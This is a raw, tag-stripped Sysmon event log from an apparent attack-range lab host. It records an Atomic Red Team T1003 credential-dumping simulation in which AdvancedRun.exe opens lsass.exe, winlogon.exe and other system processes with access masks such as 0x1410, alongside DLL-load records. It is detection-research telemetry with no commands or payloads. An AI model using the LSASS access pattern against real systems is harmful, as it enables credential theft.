17:28:56.512{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003952978Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.512{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952977Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.512{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952976Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.512{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952975Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.512{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952974Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.512{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952973Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.512{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952972Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.512{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952971Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.512{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952970Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.512{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003952969Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.512{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003952968Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.512{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952967Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.512{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003952966Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.512{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003952965Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.512{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952964Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.512{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952963Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.512{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952962Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952961Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952960Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952959Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952958Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952957Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952956Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952955Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 